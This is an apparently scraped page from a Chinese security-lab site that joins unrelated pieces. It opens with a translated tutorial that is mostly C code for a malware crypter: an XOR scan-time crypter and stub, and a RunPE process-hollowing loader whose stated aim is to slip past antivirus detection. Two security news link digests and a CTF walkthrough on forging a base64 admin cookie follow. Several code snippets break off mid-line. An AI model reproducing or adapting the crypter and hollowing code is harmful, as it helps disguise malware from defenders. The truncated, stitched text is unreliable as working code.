这个设计方案在同一个可执行文件中同时实现了加密器和stub，我们可以这样做，是因为这两个操作非常相似。下面用代码来介绍一下设计方案。 首先，我们需要定义main和两个条件，这两个条件定义了是执行加密器还是stub。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine } else { // crypter routine } return EXIT_SUCCESS; } 由于我们将应用程序设计成了窗口应用程序，我们不能像通常基于控制台的应用程序中那样检索 argc 和 argv，但是微软提供了使用 argc 和 argv的解决方案。如果命令行参数 __argv[1] 存在，应用程序将尝试对指定的文件进行加密，否则，它将尝试解密一个被加密的文件。 接下来是加密程序，我们需要 __argv[1] 来指定文件的句柄和它的大小，这样我们就可以把它的字节复制到一个缓冲区中进行加密。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine } else { // crypter routine // open file to crypt HANDLE hFile = CreateFile(__argv[1], FILE_READ_ACCESS, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // get Crypt函数主要是将文件内容读入到一个缓冲区中，然后对其进行加密，然后返回一个指向缓冲区的指针。 LPVOID Crypt(HANDLE hFile, DWORD dwFileSize) { // allocate buffer for file contents LPVOID lpFileBytes = malloc(dwFileSize); // read the file into the buffer ReadFile(hFile, lpFileBytes, dwFileSize, NULL, NULL); // apply XOR encryption int i; for (i = 0; i < dwFileSize; i++) { *((LPBYTE)lpFileBytes  现在我们有了加密的字节，我们需要创建一个新的文件，然后将这些字节写入其中。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine } else { // crypter routine ... // get crypted file name in current directory CHAR szCryptedFileName[MAX_PATH]; GetCurrentDirectory(MAX_PATH, szCryptedFileName); strc 加密器部分差不多就是这些了。注意，我们使用了一个简单的XOR来加密文件的内容，如果我们能够获得密钥，这种方案的安全性可能是不够的。如果我们想更加安全，我们可以使用其他的加密方案，如RC4或(x)TEA。我们不需要完整的加密算法，因为我们的目的是为了避免基于签名的检测，因此这么做完全是矫枉过正。保持文件小而简单最重要。 让我们继续进入stub例程。对于stub程序，我们要检索当前目录下的加密文件，然后将解密后的内容写入一个临时文件中进行执行。  我们首先要得到当前的要处理的文件，然后打开文件，得到文件大小。  int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine // get target encrypted file CHAR szEncryptedFileName[MAX_PATH]; GetCurrentDirectory(MAX_PATH, szEncryptedFileName); strcat(szEncryptedFileName, "\\"); strcat(szEncr  和加密器例程差不多。接下来，我们要读取文件内容，并得到解密后的字节。由于XOR操作恢复了给定的公共位的值，我们可以简单地重用Crypt函数。之后，我们需要创建一个临时文件，并将解密后的字节写入其中。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine ... // decrypt and obtain decrypted bytes LPVOID lpFileBytes = Crypt(hFile, dwFileSize); CloseHandle(hFile); // get file in temporary directory CHAR szTempFileName[MA 最后，我们需要执行解密后的应用程序。 int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if (__argc < 2) { // stub routine ... // execute file ShellExecute(NULL, NULL, szTempFileName, NULL, NULL, 0); } else { // crypter routine } return EXIT_SUCCESS; } 请注意，一旦解密后的应用程序被写入磁盘，它很有可能被杀毒软件的基于签名的检测方式检测出来，因此这样有可能捕获大多数的恶意软件。正因为如此，恶意软件的作者需要编写即使他们的应用程序在这种情况下仍然能够执行的功能。 扫描时加密器就到此为止。  编写一个运行时加密器 对于运行时加密器，我的文章只涉及stub，因为它还包括更复杂的过程，所以我们将假设应用程序已经被加密。这些加密器使用一种叫做RunPE的流行技术。它的工作原理是stub先解密应用程序的加密字节，然后模拟Windows加载器，将它们推送到暂停进程的虚拟内存空间中。这个过程完成后，stub将把暂停的进程恢复运行。 注意：为了简洁和可读性，我将不包含错误检查。 stub伪代码  1. Decrypt application 2. Create suspended process 3. Preserve process's thread context 4. Hollow out process's virtual memory space 5. Allocate virtual memory 6. Write application's header and sections into allocated memory 7. Set modified thread context 8. Resume process 9. Finish  我们可以看到，这需要相当多的Windows内部知识，包括PE文件结构、Windows内存操作和进程/线程的知识。我强烈建议读者在理解这些知识的基础上来理解下面的材料。 首先，让我们在main中设置两个例程，一个用于解密被加密的应用程序，另一个用于将其加载到内存中执行。 APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { Decrypt(); RunPE(); return EXIT_SUCCESS; } Decrypt函数实现方式完全依赖于用于应用程序的加密方式，这里是一个使用XOR的示例代码。 VOID Decrypt(VOID) { int i; for (i = 0; i < sizeof(Shellcode); i++) { Shellcode[i] ^= Key[i % sizeof(Key)]; } } 现在，应用程序已经被解密，让我们来看看神奇的地方。在这里，我们通过检查DOS和PE签名来验证该应用程序是否是一个有效的PE文件。 VOID RunPE(VOID) { // check valid DOS signature PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)Shellcode; if (pidh->e_magic != IMAGE_DOS_SIGNATURE) return; // check valid PE signature PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS)((DWORD)Shellcode + pidh->e_lfanew); if (pinh->Signature != IMAGE_NT_SIGNAT  现在，我们将创建暂停的进程。 VOID RunPE(VOID) { ... // get own full file name CHAR szFileName[MAX_PATH]; GetModuleFileName(NULL, szFileName, MAX_PATH); // initialize startup and process information STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); // required to set size of si.cb 注意，szFileName可以是任何可执行文件的完整路径，如explorer.exe或iexplore.exe，但在本例中，我们将使用stub的文件。CreateProcess函数将在暂停状态下创建一个指定文件的子进程，这样我们就可以根据自己的需要来修改它的虚拟内存内容。 VOID RunPE(VOID) { ... // obtain thread context CONTEXT ctx; ctx.ContextFlags = CONTEXT_FULL; GetThreadContext(pi.Thread, &ctx); } 现在我们清空进程的虚拟内存区域，这样我们就可以为应用程序分配自己的运行空间。为此，我们需要一个函数，而这个函数对我们来说并不是现成的，因此我们需要一个函数指针，指向一个从ntdll.dll 文件中动态检索内容的函数。 typedef NTSTATUS (*fZwUnmapViewOfSection)(HANDLE, PVOID); VOID RunPE(VOID) { ... // dynamically retrieve ZwUnmapViewOfSection function from ntdll.dll fZwUnmapViewOfSection pZwUnmapViewOfSection = (fZwUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwUnmapViewOfSection"); // hollow p 由于被暂停的进程在其虚拟内存空间内有自己的内容，我们需要从内存中对它进行解映射，然后分配我们自己的内容，这样我们就有访问权限来加载我们的应用程序的映像。我们将通过WriteProcessMemory函数来实现。首先，我们需要像Windows加载器一样，先写头文件，然后分别写每个部分。这一部分需要对PE文件结构有一个全面的了解。  VOID RunPE(VOID) { ... // write header WriteProcessMemory(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, Shellcode, pinh->OptionalHeader.SizeOfHeaders, NULL); // write each section int i; for (i = 0; i < pinh->FileHeader.NumberOfSections; i++) { // calculate and get ith section PIMAGE_SECTION 现在一切就绪，我们只需修改上下文的切入点地址，然后恢复暂停的线程。 VOID RunPE(VOID) { ... // set appropriate address of entry point ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint; SetThreadContext(pi.hThread, &ctx); // resume and execute our application ResumeThread(pi.hThread); } 现在，应用程序已经开始在内存中运行，希望杀毒软件不会检测到它。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、机器学习提供了解决SQL注入漏洞的新方法 https://portswigger.net/daily-swig/machine-learning-offers-fresh-approach-to-tackling-sql-injection-vulnerabilities 2、SpamCop反垃圾邮件服务在其域名过期后发生中断 https://www.bleepingcomputer.com/news/security/spamcop-anti-spam-service-suffers-an-outage-after-its-domain-expired/ 3、针对SonicWall网络设备中的0day漏洞已被在野利用 https://www.zdnet.com/article/sonicwall-zero-day-exploited-in-the-wild/ 4、YouPHPTube和AVideo中的多个漏洞可致远程代码执行 https://portswigger.net/daily-swig/vulnerabilities-in-open-source-streaming-platforms-youphptube-and-avideo-could-lead-to-rce 5、研究人员发现了用于横向移动的新型Trickbot模块 https://securityaffairs.co/wordpress/114103/malware/trickbot-new-module.html 6、针对NoxPlayer 安卓模拟器的供应链攻击-NightScout行动 https://securityaffairs.co/wordpress/114090/hacking/noxplayer-supply-chain-attack.html 7、谷歌披露了广泛使用的Libgcrypt加密库严重漏洞 https://securityaffairs.co/wordpress/114076/security/libgcrypt-encryption-library-flaw.html 8、专家披露Azure Functions 漏洞可造成Docker逃逸 https://securityaffairs.co/wordpress/114061/hacking/azure-functions-escape-docker.html 9、外包服务集团Serco Group遭勒索软件攻击 https://www.infosecurity-magazine.com/news/global-government-outsourcer-serco/ 10、网络犯罪组织Rocke正积极利用恶意软件Pro-Ocean https://securityaffairs.co/wordpress/114005/malware/pro-ocean-miner.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Popup Builder插件漏洞影响20万WordPress网站 https://threatpost.com/wordpress-pop-up-builder-plugin-flaw-plagues-200k-sites/163500/ 2、新的挖矿软件Pro-Ocean针对ActiveMQ、WebLogic等 https://securityaffairs.co/wordpress/114005/malware/pro-ocean-miner.html 3、美国电信运营商UScellular披露数据泄露 https://securityaffairs.co/wordpress/114023/data-breach/uscellular-data-breach.html 5、Fonix勒索软件关闭并释放主解密密钥 https://www.bleepingcomputer.com/news/security/fonix-ransomware-shuts-down-and-releases-master-decryption-key 6、英国研究与创新局（UKRI）遭勒索软件攻击 https://securityaffairs.co/wordpress/114026/hacking/ukri-ransomware-attack.html 7、编程网站Perl.com的域名被劫持 https://securityaffairs.co/wordpress/114006/hacking/website-perl-com-hijacked.html 8、研究人员发现用于卫星影像的NITRO开源库存在多个漏洞 https://www.scmagazine.com/home/security-news/vulnerabilities/flaws-in-open-source-library-used-by-dod-ic-for-satellite-imagery-could-lead-to-system-takeovers/ 9、Windows Installer零日漏洞补丁已发布 https://www.bleepingcomputer.com/news/security/windows-installer-zero-day-vulnerability-gets-free-micropatch 10、GnuPG加密软件中漏洞可致远程代码执行 https://nakedsecurity.sophos.com/2021/01/31/gnupg-crypto-library-can-be-pwned-during-decryption-patch-now/

这次的题目是进入网站后台找flag，题目地址：https://www.yijinglab.com/expc.do?w=exp_ass&ec=ECID9d6c0ca797abec2016092313250000001& 首先打开题目网页，内容如下：简单的字母提示和一个明显的按钮。 点击按钮，左上角页面出现提示：Only Member with Admin rights is allow to enter。意思是只能以管理员身份进入网站后台。 用brupsuit抓包，看看数据包的发送情况： 返回的数据包中设置了cookie的值，Member的值经过了base64加密。在burpsuite的decoder模块解码——>输入Tm9ybWFs——>Decode as ——>Base64： 然后根据页面的提示，把Admin进行base64加密，得到得到QWRtaW4=，构造这样一个请求包，发送。  然后再Intercept中将Member的值换成上面加密的值，并点击Forward发送。 出现flag 实验总结： 主要用到bursuite抓包分析数据，还有base64的加密和解密。 Base64密文有如下特点： - 字符串只可能包含A-Z，a-z，0-9，+，/，=字符  - 字符串长度是4的倍数  - =只会出现在字符串最后，可能没有或者一个等号或者两个等号